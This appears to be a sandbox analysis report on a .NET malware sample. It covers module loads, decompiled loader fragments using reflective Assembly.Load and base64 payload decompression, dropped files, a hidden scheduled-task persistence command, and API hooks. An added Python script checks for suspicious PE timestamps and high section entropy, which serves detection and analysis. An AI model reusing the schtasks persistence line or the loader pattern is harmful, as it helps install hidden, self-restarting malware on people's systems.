                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\lsass.exe Section loaded: ngcpopkeysrv.dll
Source: C:\Windows\System32\lsass.exe Section loaded: devobj.dll
Source: C:\Windows\System32\lsass.exe Section loaded: pcpksp.dll
Source: C:\Windows\System32\lsass.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\lsass.exe Section loaded: tbs.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wlidsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gamestreamingext.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msauserext.dll
Source: C:\Windows\System32\svchost.exe Section loaded: tbs.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptnet.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptngc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptprov.dll
Source: C:\Windows\System32\svchost.exe Section loaded: elscore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: elstrans.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanagersvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\r8k29DBraE.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\r8k29DBraE.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: r8k29DBraE.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: r8k29DBraE.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Windows.Forms.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
Source: Binary string: System.Drawing.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
Source: Binary string: System.Xml.ni.pdbP source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERE551.tmp.dmp.8.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000015.00000000.1433048266.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2634750925.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WERE551.tmp.dmp.8.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERE551.tmp.dmp.8.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000015.00000000.1433048266.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2634750925.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdb$ source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERE551.tmp.dmp.8.dr
Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb\2 source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: gs.pdb'E source: WerFault.exe, 00000008.00000002.1585866335.00000265B1A0B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000015.00000002.2635721710.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434010255.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERE551.tmp.dmp.8.dr
Source: Binary string: System.Configuration.ni.pdbD source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: gs.pdb source: WerFault.exe, 00000008.00000002.1585866335.00000265B1A0B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
Source: Binary string: System.ni.pdbRSDS source: WERE551.tmp.dmp.8.dr
Source: Binary string: System.Drawing.pdbHt' source: WERE551.tmp.dmp.8.dr
Source: Binary string: mscorlib.ni.pdbLe: source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000015.00000002.2635721710.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434010255.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
Source: Binary string: System.Core.pdb@ source: WERE551.tmp.dmp.8.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000015.00000002.2635721710.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434010255.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERE551.tmp.dmp.8.dr
Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
Source: Binary string: System.pdbMZ source: WERE551.tmp.dmp.8.dr
Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
Source: Binary string: System.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000015.00000002.2635721710.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434010255.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
Source: Binary string: System.Core.ni.pdb$g source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Drawing.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
Source: Binary string: System.Core.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERE551.tmp.dmp.8.dr

Data Obfuscation

                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, didyoumissme.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Thelounge.Love,Thelounge.Feelings,Thelounge.SPL,Thelounge.KEY,Iloveyou.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, didyoumissme.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Iloveyou.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, didyoumissme.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, didyoumissme.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Thelounge.Love,Thelounge.Feelings,Thelounge.SPL,Thelounge.KEY,Iloveyou.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, didyoumissme.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Iloveyou.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, didyoumissme.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                Source: r8k29DBraE.exe, -Module-.cs.Net Code: wzcdetect System.Reflection.Assembly.Load(byte[])
                Source: r8k29DBraE.exe, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                Source: r8k29DBraE.exe, Form1.cs.Net Code: InitializeComponent contains xor as well as GetObject
                Source: 1.2.r8k29DBraE.exe.2616e810000.11.raw.unpack, 2-eaq-rvqt-9ov-hv8-iamz6-p-.cs.Net Code: _00200hv_00208r_EAF0q6_0020z7f_0020gj4_0D72k_0028u_0020p_EAF0_0020_0028p System.Reflection.Assembly.Load(byte[])
                Source: 1.2.r8k29DBraE.exe.2611006dab0.2.raw.unpack, 2-eaq-rvqt-9ov-hv8-iamz6-p-.cs.Net Code: _00200hv_00208r_EAF0q6_0020z7f_0020gj4_0D72k_0028u_0020p_EAF0_0020_0028p System.Reflection.Assembly.Load(byte[])
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, didyoumissme.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, didyoumissme.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, didyoumissme.cs.Net Code: Memory
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, Iloveyou.cs.Net Code: XMemory System.AppDomain.Load(byte[])
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, didyoumissme.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, didyoumissme.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, didyoumissme.cs.Net Code: Memory
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, Iloveyou.cs.Net Code: XMemory System.AppDomain.Load(byte[])
                Source: r8k29DBraE.exeStatic PE information: 0xDB5F1B53 [Sat Aug 17 17:20:19 2086 UTC]
                Source: C:\Users\user\Desktop\r8k29DBraE.exe Code function: 1_2_000002616F31BADD push rcx; retf 003Fh 1_2_000002616F31BADE
                Source: C:\Users\user\Desktop\wzcsvc.exe Code function: 4_2_0000023EB6A0BADD push rcx; retf 003Fh 4_2_0000023EB6A0BADE
                Source: C:\Windows\System32\svchost.exe Code function: 5_2_000002168199BADD push rcx; retf 003Fh 5_2_000002168199BADE
                Source: C:\Windows\System32\svchost.exe Code function: 5_2_00000216819CC6DD push rcx; retf 003Fh 5_2_00000216819CC6DE
                Source: C:\Windows\System32\winlogon.exe Code function: 6_2_000001CA7D1CBADD push rcx; retf 003Fh 6_2_000001CA7D1CBADE
                Source: C:\Windows\System32\winlogon.exe Code function: 6_2_000001CA7D1FC6DD push rcx; retf 003Fh 6_2_000001CA7D1FC6DE
                Source: C:\Windows\System32\lsass.exe Code function: 9_2_0000017D2DD3BADD push rcx; retf 003Fh 9_2_0000017D2DD3BADE
                Source: C:\Windows\System32\lsass.exe Code function: 9_2_0000017D2DD6C6DD push rcx; retf 003Fh 9_2_0000017D2DD6C6DE
                Source: C:\Windows\System32\svchost.exe Code function: 10_2_0000022F4B90BADD push rcx; retf 003Fh 10_2_0000022F4B90BADE
                Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000013DE273C6DD push rcx; retf 003Fh 11_2_0000013DE273C6DE
                Source: C:\Windows\System32\dwm.exe Code function: 14_2_00000262F1CB8FED pushfq ; retf 14_2_00000262F1CB901A
                Source: C:\Windows\System32\dwm.exe Code function: 14_2_00000262F1CB901D pushfq ; retf 14_2_00000262F1CB902A
                Source: C:\Windows\System32\dwm.exe Code function: 14_2_00000262F1CBA815 pushfq ; retf 14_2_00000262F1CBA822
                Source: C:\Windows\System32\dwm.exe Code function: 14_2_00000262F1CBAFA5 pushfq ; retf 14_2_00000262F1CBAFF2
                Source: C:\Windows\System32\dwm.exe Code function: 14_2_00000262F1CB8FB9 pushfq ; retf 14_2_00000262F1CB8FBA
                Source: C:\Windows\System32\dwm.exe Code function: 14_2_00000262F1CB8FDD pushfq ; retf 14_2_00000262F1CB8F8A
                Source: C:\Windows\System32\dwm.exe Code function: 14_2_00000262F1CB8F9D pushfq ; retf 14_2_00000262F1CB8FAA
                Source: C:\Windows\System32\dwm.exe Code function: 14_2_00000262F1CB8F2D pushfq ; retf 14_2_00000262F1CB8F3A
                Source: C:\Windows\System32\dwm.exe Code function: 14_2_00000262F1CB8F3D pushfq ; retf 14_2_00000262F1CB8F4A
                Source: C:\Windows\System32\dwm.exe Code function: 14_2_00000262F1CB8F4D pushfq ; retf 14_2_00000262F1CB8F5A
                Source: C:\Windows\System32\dwm.exe Code function: 14_2_00000262F1CB8F5D pushfq ; retf 14_2_00000262F1CB8F6A
                Source: C:\Windows\System32\dwm.exe Code function: 14_2_00000262F1CB8EED pushfq ; retf 14_2_00000262F1CB8EFA
                Source: C:\Windows\System32\dwm.exe Code function: 14_2_00000262F1CBA6F1 pushfq ; retf 14_2_00000262F1CBA6F2
                Source: C:\Windows\System32\dwm.exe Code function: 14_2_00000262F1CB8EFD pushfq ; retf 14_2_00000262F1CB8F0A
                Source: C:\Windows\System32\dwm.exe Code function: 14_2_00000262F1CB8F0D pushfq ; retf 14_2_00000262F1CB8F2A
                Source: C:\Windows\System32\dwm.exe Code function: 14_2_00000262F1CBA6E1 pushfq ; retf 14_2_00000262F1CBA6E2
                Source: C:\Windows\System32\dwm.exe Code function: 14_2_00000262F1CBC6DD push rcx; retf 003Fh 14_2_00000262F1CBC6DE
                Source: C:\Windows\System32\dwm.exe Code function: 14_2_00000262F1CBAED5 pushfq ; retf 14_2_00000262F1CBAEE2
                Source: C:\Windows\System32\dwm.exe Code function: 14_2_00000262F1CBAE75 pushfq ; retf 14_2_00000262F1CBAE92
                Source: C:\Windows\System32\dwm.exe Code function: 14_2_00000262F1CBAE95 pushfq ; retf 14_2_00000262F1CBAEB2
                Source: C:\Windows\System32\dwm.exe Code function: 14_2_00000262F1CBAE55 pushfq ; retf 14_2_00000262F1CBAE72
                Source: r8k29DBraE.exe Static PE information: section name: .text entropy: 7.739802708970689
                Source: wzcsapi.exe.1.dr Static PE information: section name: .text entropy: 7.614490853127165
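The two static indicators above (a compile timestamp in the year 2086 and a .text section with entropy close to 8 bits per byte) are cheap to reproduce on any sample before detonation. The script below is an added example, not part of the Joe Sandbox report or the XWorm sample: it reads the COFF TimeDateStamp from a PE header, decodes it, flags zero or future build times, and computes Shannon entropy over a section body. Because the real .text bytes are not on this page, the fixture is a constructed minimal PE header carrying the reported timestamp, and a uniform byte table stands in for packed code; the reference time used for the "future" check is an assumed value, not taken from the report.

```python
import math
import struct
from datetime import datetime, timezone

# Assumed reference time for the "future timestamp" check (2024-10-15 00:00 UTC).
REFERENCE_NOW = 1728950400


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty/constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_timestamp(pe: bytes) -> int:
    """Read the raw COFF TimeDateStamp (32-bit Unix time) from a PE image."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # COFF header after the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    return struct.unpack_from("<I", pe, e_lfanew + 8)[0]


def format_timestamp(ts: int) -> str:
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


def timestamp_is_implausible(ts: int, now_ts: int = REFERENCE_NOW) -> bool:
    """Zero or future build times cannot be real. Both are common in malware, but also in
    deterministic .NET/Roslyn builds, where the field holds a content hash, not a date."""
    return ts == 0 or ts > now_ts


def build_minimal_pe(timestamp: int) -> bytes:
    """Constructed fixture: DOS header + PE signature + COFF header only. Not a loadable
    image, just enough structure for pe_timestamp() to parse."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE signature at offset 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, 1, timestamp, 0, 0, 0, 0)  # AMD64, 1 section
    return bytes(dos) + b"PE\0\0" + coff


def triage(pe: bytes, text_section: bytes, now_ts: int = REFERENCE_NOW,
           entropy_threshold: float = 7.2) -> dict:
    """Summarise the two static indicators the report lists: build time and .text entropy."""
    ts = pe_timestamp(pe)
    ent = shannon_entropy(text_section)
    return {
        "timestamp": format_timestamp(ts),
        "timestamp_suspicious": timestamp_is_implausible(ts, now_ts),
        "text_entropy": round(ent, 3),
        "text_packed_likely": ent >= entropy_threshold,
    }


if __name__ == "__main__":
    # 0xDB5F1B53 is the TimeDateStamp from the report; the byte table is a stand-in
    # for a packed/encrypted .text section (constructed, not the sample's bytes).
    sample = build_minimal_pe(0xDB5F1B53)
    packed_like = bytes(range(256)) * 16
    print(triage(sample, packed_like))
```

Treat the timestamp as weak evidence on its own: since deterministic builds became the Roslyn default, the TimeDateStamp of a .NET assembly is routinely a hash that decodes to a nonsense date, so the entropy reading and the runtime behaviour below carry more weight than the year 2086 by itself.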

                Persistence and Installation Behavior

                Source: C:\Windows\System32\lsass.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D (2 events)
                Source: C:\Users\user\Desktop\r8k29DBraE.exe File created: C:\Users\user\Desktop\wzcsapi.exe
                Source: C:\Users\user\Desktop\r8k29DBraE.exe File created: C:\Users\user\Desktop\wzcsvc.exe

                Boot Survival

                Source: C:\Users\user\Desktop\wzcsapi.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "wzcsapi" /tr "%Current%\wzcsapi.exe"

                Hooking and other Techniques for Hiding and Protection

                Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                Source: explorer.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
